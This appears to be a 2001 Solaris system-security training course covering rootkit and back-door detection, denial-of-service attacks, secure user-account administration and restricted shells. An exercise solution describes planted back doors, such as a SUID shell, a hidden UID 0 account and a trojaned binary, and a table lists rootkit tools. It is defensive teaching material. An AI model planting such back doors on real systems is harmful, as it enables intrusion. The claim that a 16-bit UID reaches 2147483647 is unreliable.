Run the strings command on system binaries. For example, if:

# strings /usr/sbin/inetd

produces the string /bin/sh (or something similar) you should besuspicious of this file. You can also look at the file type, as shown inCode 4-5.

Code 4-5 Checking File Type

# file /usr/sbin/intetd/usr/sbin/inetd: ELF 32-bit MSB executable SPARC Version 1,dynamically linked, stripped

If the output of file says that the program is not stripped, it has beentampered with.

The intruder might have left some rootkit utilities on the system. Table 4-4shows some programs to look for.

Table 4-4 Rootkit Utilities

Program Use

fix Installs a Trojan horse (for example ls ) with the sametimestamp and checksum information

sniffchk Checks to make sure a sniffer is still running

wted An editor for the wtmp file

z2 Erases entries from the wtmpx/utmpx /lastlog file

bindshell Binds a root shell to a port (port 31337 by default)



You should become familiar with the /proc file system. You can examinethis directory to find out which processes are running. Compare theoutput to what the ps command shows so that you can determinewhether the ps command has been modified. The Solaris OE has manyutilities which provide more information on processes in the /proc filesystem (see Solaris OE manual page proc(1) ).

The best defense is a clean set of statically linked1 binaries for yoursystem. Keep a copy of common programs such as ps , ls , and ifconfigstored on a CD-ROM or floppy disk. When you suspect a compromisedsystem, download the clean binaries, ensure that your PATHenvironmentvariable is set to use them, and begin looking for back doors.

Note – A number of statically linked utilities are provided in the/usr/sbin/static directory.

Kernel Rootkits

The kernel rootkit is a troubling development in the hacker world. Thisrootkit exploits the use of loadable kernel modules (LKMs) to modify therunning UNIX kernel.

With the initial root account access, the attacker uses the modloadcommand to load two kernel modules. The first contains the hackingutilities. The second ensures that the rootkit modules do not appear in themodinfo listing.

Table 4-5 shows typical utilities in a kernel rootkit.

1. An attacker can modify or replace system libraries so any dynamically linkedprogram cannot be trusted.

Table 4-5 Kernel Rootkit Utilities

Utility Use

hidef ,unhidef

Hides and unhides files on the system

ered Performs exec redirection, which allows Trojan horse programsto execute

nethide Hides connections by the attacker from other systems



Preventing Kernel Rootkit Attacks

When the attacker has modified the kernel, and covered the initial tracks,it is very difficult to detect the intrusion. To ensure LKMs are reloadedafter a system reboot, the attacker must hide the module either in thestandard locations for loadable modules or in the /etc/init.d startupscripts.

At boot time, the kernel loads modules from the following directories:

/platform/ uname -i /kernel:\/platform/ uname -m /kernel:/kernel:/usr/kernel

You should check these directories for “foreign” files on a regular basisusing auditing tools such TripWire or the Solaris Fingerprint database.

testhack Changes the UID, GID, or both, of a running process (forexample, to change the process owner of a running /bin/sh toroot )

rootme Gains root access without running SUID programs

Table 4-5 Kernel Rootkit Utilities (Continued)

Utility Use

Identifying Denial of Service Attacks



Denial of service (DoS) can occur for many reasons, including:

● Physical destruction of equipment

● Removal of data or software

● Malicious system configuration changes

● Depletion of system resources such as memory, swap space, filespace, network bandwidth, and so on

DoS is usually the result of users using more system resources (such asdisk space, memory, or the number of processes running) than theyshould. Attacks like these can be accidental or malicious, and the attackersmight be trusted internal users or outside intruders. As the system’sresources are depleted by the attacker, other users cannot log in or runprograms.

When suspicious files or processes are detected, prompt and proper actionis required. Disk space, swap space, memory, and a number of processesneed attention and protection.



Malicious DoS Attacks

Worms or fork bombs are intentional attacks on system resources. Wormsare self-replicating programs that copy themselves within a system, orfrom system to system.

The Internet Worm

The most well-known example of this type of problem is the Internetworm, which infected the Internet in l988. Within an eight-hour period,2500 to 3000 systems were infected and were using all of their processortime to distribute the worm.

The success of the Internet worm was based on its three options fortransmission:

● A bug in the fingerd daemon

● Exploitation of ‘trusted hosts’ using the rsh shell

● A bug in the sendmail program (debug mode)



Fork Bombs

Fork bombs are processes that duplicate themselves, sometimesexponentially, until the maximum number of system processes is exceededand no new processes can start.

The following are all examples of malicious DoS attacks that have beenused against systems.

Toll-Free Number Attack

In the mid 1980s, a political organization set up a toll-free telephonenumber. An individual programmed his computer to repeatedly dial thenumber and then hang up. This did two things:

● It busied the line so that legitimate callers could not get a connection

● It cost the organization money every time a call was completed

Network Attacks

Network attacks include:

● TCP SYN – A DoS attack taking advantage of the TCP three-wayhandshake to overload the server (see Module 10, “TCP SYN FloodAttack” on page 10-35).

● Ping of death – An attack that sends an IP packet that is larger thanthe legal size to a server. The server typically crashes when trying toreconstruct the illegal packet.

● Smurf – An attack where a ping request is broadcast to all machineson the network. The return address for the request is altered to themachine being attacked. This machine's network interface is thenoverloaded dealing with all the responses.



Preventing DoS Attacks

While some DoS attacks cannot be prevented, many others can be.Table 4-6 lists attacks and their preventions.

Table 4-6 Malicious DoS Attacks

Attack Prevention

Reformatting a diskpartition

Prevent access to systems in single-user mode. Protect theroot account. Physically write-protect read-only disks.

Deleting critical files Same protection as described in “Detecting and PreventingTrojan Horse and Back Door Attacks” on page 4-18. Setownership of NFS-mounted file systems to the root userand export read-only.

Powering downmachine

Physically secure the machine in locked area. Protectsystems with uninterrupted power supplies.

Damaging cables Run cables through conduits and protect areas wherecables are exposed.



Recognizing Causes of Accidental DoS

Accidental DoS is nearly always preventable, but accidents do happen.Table 4-7 contains a list of common problems that can lead to DoS.

System crash due toprocess overload

Set the kernel tunable parameter to maxuprc=50 .

Filling up disks Protect ufs file systems with disk quotas. Use the quot , duand find commands to analyze disk use. Set the filesystem minfree value to maintain a sensible amount offree space using the tunefs command.

Network attacks Restrict access to your networks with correctly set uprouters and firewalls. Use network monitors such asCourtney or Gabriel.

Table 4-6 Malicious DoS Attacks (Continued)

Attack Prevention

Table 4-7 Accidental DoS

Problem Prevention

Large log files filling up filesystems

Monitor disk free space regularly. Archive orsummarize and remove large log files on a regularbasis.

Accidentally archiving to afile rather than a removablemedia device

Set file size limits with limit . Put backupcommands in scripts.

Programs in developmenthogging system resources

Use the system parameter ulimit to restrict thenumber of open files, CPU time, and memory usage.Set the kernel tunable parameter maxupoc to anumber such as 50.

Exercise: Detecting Trojan Horses and Back Doors


Exercise: Detecting Trojan Horses and Back Doors


● Use your knowledge and skills to find and remove Trojan horses andback doors preinstalled on your system

● Discuss how the system could have been hardened to prevent theattacks

Task – Detecting Trojan Horses and Back Doors

Unknown to you, back doors and Trojan horses were created when youran the setup script in the exercises for Module 1.

Detect as many of these Trojan horses and back doors as you can.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are the solutions to the exercises.

Detecting Trojan Horses and Back Doors

1. You have four back doors and two Trojan horses on your system.

a. A shell script called find in eve ’s home directory that creates aSUID Korn shell in the /tmp directory.

b. A device /devices/pseudo/ptd@0:ptminor that gives anyoneaccess to the raw device where the root directory is mounted.

c. Access for eve to the same root directory through a device ineve ’s home directory called .root .

d. A superuser account called ftfp with superuser UID 0.

e. A .rhosts file in / that gives the eve user access to the systemas the root user.

f. The system file /usr/bin/clear has been replaced with aprogram that creates a root -owned Korn shell in eve ’s homedirectory whenever it is run.

Note – If you think you have found another attack not listed here, pleaseinform your instructor.

2. These are the preventative measures:

a. You cannot stop user eve from writing a script such as the findscript here, but removing the current directory from the rootaccount’s path prevents it from being run.

b. This device had to be installed by someone with access to theroot account (the mknod utility requires superuser privileges),so this can only be prevented by stopping access to thesuperuser account. Check the file systems regularly for newdevices or devices with write permission enabled.

c. Same solution as step 2b.

Exercise Solutions


d. Although it is impossible to prevent someone with access to theroot account from editing the password and shadow files,these files should be monitored regularly for unauthorizedchanges.

e. Methods of mitigating attacks of this kind are covered later inthis course.

f. You should check all system utilities regularly for changes insize, modification time, and checksum.


Module 5

Administering User Accounts Securely

Objectives


● Explain how to add, maintain, and delete user accounts securely

● Administer login accounts with special requirements

● Describe how to make special user accounts more secure

● Configure restricted shell accounts

Relevance


Relevance

?!

Discussion – Consider what your company’s security requirements are,and what the primary lines of defense should be. How can you protect:

● User accounts?

● Access to the root directory?

● Company user files from guest users?


Administering User Accounts Securely 5-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C




● Stoll, Clifford. The Cuckoo’s Egg. Pocket Books, 1995.

Administering Regular Users



An intruder gaining access to one or more of your accounts is a commonbreach of system security. Setting up accounts in the most secure manneris, therefore, of utmost importance.

This module does not present the commands to add a user – use yourpreferred method (for example, admintool or useradd ). It is neveradvisable to manually edit the /etc/passwd and /etc/shadow filesbecause if these files are corrupted, it might not be possible to log into thesystem.

Determining User and Group IDs

User IDs (UIDs) are the mechanism that identify users in UNIX. The/etc/passwd file maps user names (which are only there for yourconvenience) and UIDs.



A UID is 16-bit integer between 0 and 2147483647, where 0 is a specialUID that denotes the superuser account. This account is traditionallynamed root, but any user name for a superuser account is valid. Anyaccount that has a UID of 0 has superuser privileges.

Traditionally, system accounts are given UIDs between 0 and 99, and useraccounts start at UID 100. Many system accounts are created atinstallation time in the /etc/passwd file. Most of these accounts arerequired for the correct operation of the system and should not bemodified. A possible exception is the uucp account, an account that makesuucp system connections. However, because the uucp account is rarelyused, it can usually be deleted.

Use the logins command to list system and user accounts on yoursystem:

● logins -s – Lists system accounts

● logins -u – Lists user accounts

Implications of Duplicate User IDs

It can be dangerous to have accounts with duplicate UIDs. The use ofduplicate UIDs gives multiple users with different user names free accessto each other’s files; they can also use the kill command to terminateeach other’s running programs. This mistake is easy to make if youmanually edit the /etc/passwd and /etc/shadow files.

Note – Manually editing either or both of the /etc/passwd and/etc/shadow files is not recommended, because mistakes in these filescan prevent many system utilities from working and, at worst, make itimpossible to log in to the system.

You can use the following logins every time a new account is added, orwhen you suspect that a duplicate account might exist. In this example,users groucho and harpo have a duplicate UID.

# logins -dgroucho 401 other 401harpo 401 other 401



An exception to this ‘no duplicate UIDs’ rule is when you want to createone or more duplicate system accounts. Use this exception if multiplepeople have access to a system account (including the superuser account)and you want to track their individual activities using the audit trail. Aduplicate system account also allows you to disable access for one systemaccount user without having to disable access for all users. Using duplicatesystem accounts has the advantage that the passwords do not have to becommunicated or shared among several people. A major disadvantage isthat it gives intruders more system accounts to attack.



Selecting and Creating Groups and Group IDs (GIDs)

Groups provide a useful way to group users. Unfortunately, the groupmechanism is rarely used effectively.

Every UNIX user belongs to one or more groups. By grouping userstogether, privileges can be easily assigned to a subset of users. A user’sprimary group is stored in the /etc/passwd file. A user can become amember of additional groups by adding entries to the /etc/group file.

The default group for the command useradd is other (GID 1) and onmany systems all users are in this other group. This means that they canall access each other’s files if the group read permission is set (which isthe default unless the umask1 command has been changed). For thisreason, some sites have a policy of giving each user a unique primarygroup (the same GID number as the UID).

1. The umask command is described in Module 8, “File System Attacks”.



Customizing Default Profiles

Many files are read by various shell programs, either at login orsubsequently (a shell is invoked every time a shell script is run), which canset system variables and configure the environment. In Table 5-1, ‘~’ refersto a user’s home directory.

Table 5-1 Profiles Run by Traditional Shell Programs

File Shell When Processed

/etc/profile sh, jshksh

Read at login for all users. Use this file to setsystem-wide variables.

/etc/.login csh Read at login for all users. Use this file to setsystem-wide variables.

~/.profile sh, jshksh

Tailors a user’s personal environment. It isprocessed after the /etc/profile file.



Use the /etc/profile or /etc/.login files to set default values forsystem-wide variables and parameters, such as a secure PATHvariable andthe umask command.

Solaris 8 OE also provides additional shells which are enhancements ofthe traditional shells, as listed in Table 5-2. These shells can use theconfiguration files of a traditional shell as well as their own specific files.

~/.kshrc ksh Read whenever a Korn shell is run. It is processedafter /etc/profile and ~/.profile files at login.Reading this file can be disabled for ksh scripts ifyou use the set -o privileged or ksh -pcommands. You can designate a different file bychanging the ENV variable.

~/.cshrc csh Read whenever a C shell is invoked. It is readbefore the .login file at login time.

~/.login csh Read by the C shell at login.

~/.logout csh Read by the C shell at logout.

Table 5-1 Profiles Run by Traditional Shell Programs (Continued)

File Shell When Processed

Table 5-2 Profiles Used by Other Shell Programs

Shell Profile Files

bash /etc/profile ~/.bash_login~/.bash_profile ~/.bashrc

tcsh /etc/csh.cshrc /etc/csh.login ~/.tcshrc~/.tcshrc ~/.history ~/.login ~/.cshdirs.logout

zsh /etc/zprofile /etc/zshenv /etc/zlogin/etc/zlogout ~/.zshenv ~/.zprofile~/.zlogin ~/.zshrc ~/.zlogout



Defaults for the .login , .profile , and .cshrc files are provided in the/etc/skel directory, but you can add any additional files that yourequire. The files in the /etc/skel directory should be edited to reflectlocal requirements. The useradd command copies all files in the/etc/skel directory to the user’s home directory when you use the -moption.

Note – The files in the /etc/skel directory are named with a prefix oflocal . If you use the useradd command to create new user accounts,remove this prefix or they are copied as, for example, local.profile ,and are not executed. If you use the Admintool tool to add user accounts,then this tool removes the prefix local from the name as it is copied.



Setting Accounts to Expire

There might be occasions when you want to prevent a user from logginginto an account. This might be due to the user’s temporary extendedabsence or as a precursor to permanently deleting the account.

The usermod command, which you can use to make changes to accountparameters, such as user ID, group ID, home directory path, and so on,can also set account inactivity and expiration times.

The relevant options for the usermod command are:

-e – Sets the date when the account expires

-f – Sets the number of days that the account must be unusedbefore it expires

For example, to make sure that a user’s account expires if the user has notlogged in for 15 days or longer, use:

# usermod -f 15 username



The expiration information is stored in the /etc/shadow file.

To automatically expire an account on a particular date, use a commandsuch as:

# usermod -e 12/31/2001 username

Note – You can use this command with a date format that is listed in the/etc/datemsk file. Many date formats are predefined in this file. See thegetdate(3C) manual page for a list of the conversion specifications.

This command expires the account at the end of the day. It is not possibleto enter today’s date, so you cannot use usermod -e to immediatelyexpire an account. Instead, use:

# passwd -l username

This command locks the account by changing the user’s encryptedpassword to *LK* and immediately expires an account. To reactivate theaccount, use the passwd command to give the user a valid password.

To reactivate an account with a set expiration date, use:

# usermod -e ""

Administering Superuser Accounts



Any user with a UID of 0 is a superuser on the system. The all-powerfulsuperuser account is a major security weakness in the UNIX operatingsystem. All security checks are turned off for the superuser, so a mistypedcommand could seriously damage the system. The superuser account is,therefore, not for casual use. All system administrators should have aregular account that they use whenever the superuser privileges are notrequired. The golden rule is: Only be the root user if you need to be the rootuser.



Restricting Root Logins

In the Solaris OE, you can configure the system so that users cannot log indirectly as the root user. Anyone who wants to become the superusermust first log into a regular account and then use the su command tospawn a privileged shell. The advantages of this are:

● Tracking who is using the root account becomes easier.

● Intruders have to break into two accounts—the non-administratoruser and the root user—to obtain superuser status.

● The password for the root account cannot be obtained from a spooflogin program left running on a terminal.

Caution – It is bad practice to log in as the root user across the network,because the plain text password is available to any intruder running anetwork sniffer program. All users logging in remotely with the telnetor rlogin commands create the same problem, so other mechanismsshould be considered to allow remote access without transferringunencrypted passwords across the network. Two such methods are settingup a trusted host (see Module 13, “Security Network Services”) and usinga secure shell (see Module 16, “Securing Remote Access”).

To disable direct login through the root account, ensure that the line:

CONSOLE=/dev/console

is not commented out in the /etc/default/login file. This ensures thatthe root user can only directly log in on the device defined as the console.

Note – This solution also disables remote login to the root account whenusing the telnet command.

Securing Guest Accounts



Having one or more guest accounts on your system is a bad idea. A guestaccount is a possible entry point at which an intended temporary user candamage the system, and a guest account is also a common target foroutside intruders. Guest accounts are often set up and forgotten, leaving agaping hole in security. The situation is worsened by the fact thatpasswords assigned to guest accounts are usually very simple, writtendown, or given to someone over whom you have little control.

If you need to create a guest account, you should follow a few rules. Theyare:

● If possible, create the account on a stand-alone machine and shuttledata to it using removable media, such as tapes or diskettes.

● If the account must be on the network, attempt to put its homedirectory on a separate partition or file system with restricted mountpermissions.

● Never create permanent guest accounts.



● Guest accounts must be used by one user only, and never shared, sothat individual accountability is maintained.

● Create the account and use a restricted shell (see “Limiting UserOptions With Restricted Shells” on page 5-27) that prohibits the userfrom browsing regular user accounts.

● Give the guest user access only to the software and commands thatthe user needs to do the job required. Be suspicious of requests forSUID programs.

● Limit the PATHvariable and other environment variables to onlywhat is needed.

● Create the account just before the guest user needs it, and delete itimmediately following the user’s exit. Disable the account in theevenings so that it is not accessible except when the user is undertrusted supervision.

● Set the account to expire automatically as soon as the user no longerrequires it. The account can always be reactivated later.

● Frequently scan guest directories for hidden or questionable files,and scan guest startup files for questionable commands or scripts.

● If possible, log in for the guest user or, at least, generate a passworddaily so that the guest user has to pick up each day’s passwordbefore starting work. This limits the opportunities for the guest userto hand the password to a third party.

● Refuse to set up SUID status for specific programs or scripts that theguest user requires or brings with them, and remove the softwareuntil you have had a chance to test it thoroughly. Ensure that youhave the source code for the software so that you, or an experiencedprogrammer, can inspect it. Compile the software on your systemand use your compiled version, not one provided by the guest user.

● Monitor guest user activity with the snoop command or ps if yoususpect them of questionable activity.

Guest accounts are for users you are unfamiliar with. Wherever possible,create a standard account with restrictions. If something goes wrong, referto your security policy for appropriate action.

Protecting Dormant Accounts



A popular point of attack is the dormant user account. Accountsbelonging to employees who have left the company or those who are onextended leave are perfect targets because activity on these accounts is notlikely to arouse suspicion. Intruders can take their time when using suchaccounts and continue to do serious damage for extended periods of time.

Note – One of the most famous accounts of serious internationalespionage using computers began with the entry of a Soviet agent into thecomputer facility of the Lawrence Berkeley Laboratory using a dormantaccount. For more than a year, a network of agents tracked the attackersas they broke into hundreds of university and military computersworldwide. This interesting story is the plot of a popular book, TheCuckoo’s Egg, by Clifford Stoll. Although this is an extreme example, thepoint is clear: manage dormant accounts with care.



There are some easy ways to prevent login to an account:

● Change the account password so it cannot be used, using:

# passwd -l username

which puts *LK* in the encrypted password field.

● Change the account login shell to a program that prevents login(such as /usr/bin/false) , using:

# usermod -s /usr/bin/false username

● Expire the account, using:

# usermod -e date username

● Set the account to expire automatically if it has been inactive for aspecific number of days, using:

# usermod -f N usernamewhere N is the number of days of inactivity allowed before theaccount is inactivated.

● Delete the account using the userdel command (see “DeletingDormant Accounts” on page 5-19).

Then use the passwd or usermod commands to reactivate an account at alater date (see the example on page 5-12).



Deleting Dormant Accounts

The best protection against the misuse of dormant accounts is to deletethem as soon as they become inactive. You must then decide what to dowith user files and emails. The easiest and safest thing to do is to delete allfiles and emails, but there might be circumstances where this is notimmediately possible (for example, when a management decision isrequired on what to do with the data).

To delete a user and the user’s home directory, use:

# userdel -r username

This command only deletes the user’s home directory. Users might havefiles in other parts of the file system (for example, they might have amailbox in /var/mail and crontabs in /var/spool/cron/crontabs ).Therefore, search the file system to ensure that the deleted user did notleave files elsewhere.

To get a list of all the files owned by the deleted user, use the command:

# find / -user username -ls



Inspect this list to verify that there has been no questionable activity bythe user which leaves the system vulnerable. Delete the files using thecommand:

# find / -user username -exec rm -f {} \;

If you must retain the files, reassign the files to another user on thesystem. To change the ownership of all the files that are to be retained,and then move the files to the new owner’s directory, change to the user’shome directory and use:

# find . -exec chown new_user {} \;

. Note – Do not reuse the UIDs of deleted accounts because the practice ofreusing UIDs can give rise to problems if files are restored from backuptapes (for example, the files of a deleted user can become owned by thenew user with the same UID). Reusing UIDs also makes tracking useractions harder. For example, if a suspicious file is owned by current user Bbut dated when user A (who had the same UID) had access to the system,you cannot be sure who is responsible for the file.

Remove any cron or at jobs belonging to deleted accounts because theseleave the system vulnerable to attack by disgruntled, outgoing employeesand intruders.

Checking User Security


Checking User Security

Using the sulog file to monitor successful and failed attempts of the sucommand to change to another user has already been presented (seeModule 2, “Using Solaris™ OE Log Files”). This section presents theparameters you can configure to make using the su command moresecure.

Configuring the /etc/default/su File

The following is a list of the default variables that you can set in the/etc/default/su file to control the characteristics of the su commandand its logging:

● SULOG=/var/adm/sulog – The SULOGvariable specifies the pathname of the log file normally set to the /var/adm/sulog file.

● CONSOLE=/dev/console – If the CONSOLEvariable is defined, allattempts to use the su command to become the root user are loggedon the console. Direct this output to the system administrator’sworkstation, where an open console window is available formonitoring su attempts as they happen.

● PATH=/usr/bin – The PATHvariable sets the available commandpath when the UID is changed to a normal user. Keep the number ofentries for the PATHvariable to a minimum.

● SUPATH=/usr/sbin:/usr/bin – The SUPATHvariable sets theavailable command path when the UID is changed to root . Ensurethat the current directory is not included in this path, either explicitlywith ‘.’ or implicitly with a leading or trailing colon.

● SYSLOG=YES– Set the SYSLOGflag to yes to indicate that sucommand usage should be logged by syslogd .

Classifying Non-Login Accounts



Many accounts are required to maintain the system. These include:

● daemon

● bin

● sys

● adm

Never use these accounts for login purposes, and place the code NPin thepassword field of /etc/shadow instead of a valid encrypted password.

Other accounts that you should not use for login purposes are softwareaccounts that manage software packages. For example, the Oracledatabase is normally installed under the Oracle user account name.These accounts should not have a valid password. Avoid this by lockingthese accounts.



To lock an account, use the command:

passwd -l username

This command inserts *LK* into the password field in the shadowpassword file. This suggests that the account is temporarily locked andmight be enabled in the future (this is not the same as a non-loginaccount).

For genuine non-login accounts, edit the /etc/shadow file and enter theNPpassword manually:

daemon:NP:6445::::::bin:NP:6445::::::

Note – You can use the Common Desktop Environment (CDE) programadmintool to set an account with no password (NP).



Restricting Functionality Using a Non-Login Shell

As an additional precaution, you can set the default shell for non-loginaccounts to a program other than /bin/sh . A good program choice is/usr/bin/false , which causes any login attempt to exit immediately.The /etc/passwd file entry would look like this:

bin:x:2:2::/usr/bin:/usr/bin/false

You can change the shell using the -e option to the passwd command,which prompts you for a new shell program:

# passwd -e usernameOld shell: /bin/shNew shell: /usr/bin/false

The new shell you enter must be a valid shell listed in the file/etc/shells (see “Interpreting the /etc/shells File” on page 5-25).

Alternatively, use the usermod -s command to change a user’s shell:

# usermod -s /usr/bin/false username



If the shell is set to a non-login program, then any attempt to use the sucommand to change to that account fails. If you must use the sucommand to go to the account, do not use this non-login shell technique.

Interpreting the /etc/shells File

The /etc/shells file is a list of valid login shells used by the passwd -ecommand. By default, this file does not exist, so you must create it to listthe valid shells that a user may use for logins. A suitable default list forvalid shells is:

You can have a shell that is not in this list, but only by manually editingthe /etc/passwd file. Accounts that already have unusual shells (such as/usr/lib/uucp/uucico for uucp ) are not affected when you create the/etc/shells file.

Note – The useradd and usermod commands are not constrained by the/etc/shells file when you specify the user’s login shell. You can alsospecify the default shell in the /etc/default/useradd file.

Preventing Unauthorized cron Entries

The crontab entries for special non-login accounts (especially bin or adm)are sometimes used by successful intruders to plant rogue programs intothe system. If the administrator detects a break-in and repairs the system,these cron files can remove the repair or create new back doors whichallow intruders to break back into the system.

Disgruntled outgoing employees can also leave time-bombs in these cronfiles.

/bin/sh /usr/bin/csh

/usr/lib/rsh /usr/bin/rsh

/usr/bin/pfsh /usr/bin/pfcsh

/usr/bin/ ksh /usr/bin/bash

/usr/bin/rksh /usr/bin/jsh

/usr/bin/pfksh /usr/bin/zsh



The administrator rarely changes the cron files after the system is set up,and is therefore unlikely to notice illegal entries into the files. Usetechniques such as fingerprinting with programs like TripWire (seeModule 9, “Auditing File Systems”) to monitor illegal modifications tothese cron files.

Limiting User Options With Restricted Shells



A restricted shell is a standard Korn or Bourne shell running with certainrestrictions applied to its commands and features. You cannot userestricted shells in conjunction with the CDE dtlogin program.

The restricted shells are:

● /usr/bin/rksh – Restricted Korn shell

● /usr/lib/rsh – Restricted Bourne shell

Note – The remote shell /usr/bin/rsh (sometimes called/usr/bin/remsh ), is often confused with the restricted Bourne shellwhich resides in the /usr/lib/rsh directory.



Assessing the Limitations Enforced by RestrictedShells

The primary purpose of a restricted shell is to allow particular userslimited access to system tools. There are various reasons for restrictingshells, but security is the primary reason. Correctly configured restrictedshells give users access only to those tools that they need to performallocated tasks, and prevent them from running other utilities.

Generally, the limitations enforced by restricted shells are:

● The user cannot change the working directory.

● The user cannot execute the PATHenvironment variable.

● The user cannot execute commands that contain a slash character, sothat the user is restricted to:

● Built-in shell commands that are not restricted

● Aliases that do not expand to commands containingthe / operator

● Commands on the defined search path

● The user cannot redirect output. Using the > or >> operatorsprevents them from creating files or overwriting existing files (suchas .profile ).

● If the user runs a sub-shell, the sub-shell is also restricted if it is thesame shell as the current one. For example, running ksh from rkshresults in a restricted shell, but running csh from rksh does not.However, restricted users can be prevented from running sub-shells(see “Configuring a Restricted Shell” on page 5-29).



Configuring a Restricted Shell

There are several ways to set up a restricted shell login. The keyrequirements are:

● Users cannot edit or modify the login environment (profilesand so on).

● Users cannot create configuration files in their home directories.

● Users cannot run unrestricted shells, and they have access only tothe limited set of commands specifically required for their jobfunction.

Note – The limitations enforced by a restricted shell do not apply whenexecuting the login profile (the .profile or .kshrc ).



Complete the following steps to restrict the user’s account.

Note – If the home directory and search path are not properly configured,as described in this section, the purpose of having a restricted shell isdefeated.

1. Create an account for the user, using either the AdminTool or theuseradd command.

a. Make sure that you select a restricted shell when creating theaccount.

b. Use the useradd command with the -s option to specify therestricted shell. To use a restricted Korn shell, for example, use:

# useradd -m -s /usr/bin/rksh alice

2. In the user’s new home directory, delete all existing files, includingfiles such as .cshrc , .login , and .profile .

3. Create a new .profile file containing the two lines:

PATH=SHELL=/usr/bin/false

Caution – If you set the SHELLvariable, some programs that use thisvariable to determine what shell environment to execute, might beprevented from working correctly.

4. Create empty files for all the configuration files you can think of.Obvious ones are:

● .kshrc

● .cshrc

● .login

● .logout

● .rhosts

● .exrc

● .mailrc

● .netrc

5. Change the ownership of the user’s home directory and all filescreated to be root files, and set them as read-only for owner , group ,and others . For example (assuming the Korn shell):



# chown -R root ~alice# chmod -R a-w,a+r ~alice

New users can now use the restricted shell. However, this shell is sorestricted that all users can do is log in and log out. No othercommands are available and users do not have write permission totheir own directory. You must now configure whichever commandsand programs are necessary to enable users to carry out their job.

Consider whether the restricted environment is for a single user or agroup of users with identical requirements.



6. Create a separate directory for the restricted user’s commands, andset the directory files to read only. The two common approaches are:

● For a single user, create a bin directory in the user’s homedirectory and set the path in .profile to:

PATH=$HOME/bin

● For multiple users, create a directory called /usr/rbin and setthe path in .profile to:

PATH=/usr/rbin

Whichever approach you take, the directory must be owned by theroot user and be read-only to the world. For example:

# mkdir /usr/rbin# chmod a=rx /usr/rbin



7. Decide on the list of commands that the user must have, and createlinks to those commands from your restricted binary directory. Donot take copies, because this complicates applying security patches,which only update the original binaries and not those in yourrestricted bin directory. You can use hard links for the multipleusers’ version but must use symbolic links for a directory in theusers’ home directory (because the home directory is likely to be ona different file partition).

# ln /usr/bin/ls /usr/rbin# ln /usr/bin/passwd /usr/rbin



8. Create a local working directory for users to work and reside in.Give users ownership of the directory together with read, write, andexecute permissions.

# mkdir ~alice/work# chown alice ~alice/work# chmod u=rwx,og= ~alice/work

9. Place users automatically in this directory when they first log in byadding the following to the end of the .profile file:

cd $HOME/work

10. Tighten the profile by using the trap and umask commands so thatthe final profile (for multiple restricted users) looks like this:

1 trap "" 2 32 umask 0773 PATH=/usr/rbin4 SHELL=/usr/bin/false5 cd $HOME/work6 trap 2 3



11. Set the password for the user account and force the user to updatethe password after first login:

1 # passwd username2 New password:3 Re-enter new password:4 passwd (SYSTEM): passwd successfully changed for <username>5 # passwd -f username

You can now use the account. On login, the user must enter a newpassword and the current working directory is set to an empty directorythat utility programs can use to store files. The user cannot create filesdirectly from the restricted shell.

Furthermore, most utility configuration files exist with a standard (secure)setting and are not writable by the user (.profile , .netrc , and .rhostsare particularly important). Even if the restricted shell setup is not perfectand a utility program allows the user to try to write to these files, the usercannot do so because the files are read-only and owned by the root user.

Exercise: Securing Guest and Restricted Accounts




● Configure a guest account to automatically expire

● Create a new user with a restricted shell account

Preparation


Tasks


Task – Creating a Guest Account With AutomaticExpiration

You have been asked, as your company’s system administrator, to set up aguest account for a temporary technical writer who is familiar with the vieditor. The writer will be at your work site for one day, but additionaldays might be needed. Make the necessary arrangements to set up theguest account as follows:

1. Add a new account with the user name guest .

a. Make guest a member of the group named guests .

b. Create the guest home directory in the /export/homedirectory.

2. Set the account to expire tomorrow.

3. Set the password to one that you believe to be secure. This passwordwill be checked as part of the exercises in the next module.

4. Make sure that the UID is not a duplicate of others already in the file.

5. Check that you can log in using the guest account.



Task – Configuring a Restricted User Account

Create a restricted user account for a new user called charles . Set up thesystem so that you can add additional restricted users with the samerequirements as charles (in other words, set up a shared bin directory).

The user charles must run the following commands:

● ls

● date

● vi

● more

● passwd

The user charles should not be able to edit any of the files in his homedirectory.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are the solutions for the tasks defined in the precedingsection.

Creating a Guest Account With Automatic Expiration

Create a guest account with automatic expiration.

1. Create the guest account using useradd or admintool .

2. Use usermod -e tomorrow's date to automatically expire theaccount.

Configuring a Restricted User Account

1. Configure a restricted user account.

a. Create the restricted binary directory for all restricted users:

# mkdir /usr/rbin# cd /usr# ln bin/ls rbin# ln bin/date rbin# ln bin/vi rbin# ln bin/more rbin# ln bin/passwd rbin# chown root /usr/rbin# chmod 555 /usr/rbin

b. Create the user charles and set the password:

# useradd -m -s /usr/bin/rksh charles# passwd charles# passwd -f charles

c. Set charles ’ home directory to be owned by the root user(readable by all) and create empty configuration files forpopular programs:

# cd ~charles# rm .* *# chmod 555 .# touch .profile .kshrc .exrc .rhosts .netrc# chmod 444 ..profile .kshrc .exrc .rhosts .netrc# chown -R root /export/home/charles

Exercise Solutions


d. Set the profile to restrict the PATHvariable to be /usr/rbin andset the SHELLvariable to a non-shell program. Set the currentdirectory to be the working directory:

# vi .profiletrap "" 2 3umask 077PATH=/usr/rbinSHELL=/usr/bin/falsecd $HOME/worktrap 2 3

e. Create the working directory.

# mkdir work# chmod 755 work# chown charles work

f. Check that the account looks okay.

# ls -l2. Log in as charles and check that the restrictions have been applied

correctly. In particular make sure that charles :

● Cannot edit .profile or any other configuration file in hishome directory

● Cannot run shell escape commands from within vi

● Can only run the restricted list of commands (that is, check thatcharles cannot run /bin/sh )


Module 6

Password Security

Objectives


● List at least two measures that constitute good password practice

● Configure and use the password-cracking tool crack

Relevance


Relevance

?!

Discussion – As a conscientious system administrator, you have donethe following:

● Removed all unnecessary user and system accounts

● Stopped direct login to superuser accounts

● Set secure PATHvariables in the /etc/profile and/etc/default/su files

● Set automatic expiration on user accounts

● Set restricted shells for all guest users

In short, you have done everything you can to protect the accounts onyour system from attack. However, you do not have control over users’choice of password. What mechanisms are there to protect your systemfrom weak password selection?


Password Security 6-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C




● Farrow, Rik. UNIX System Security. Addison Wesley, 1991.

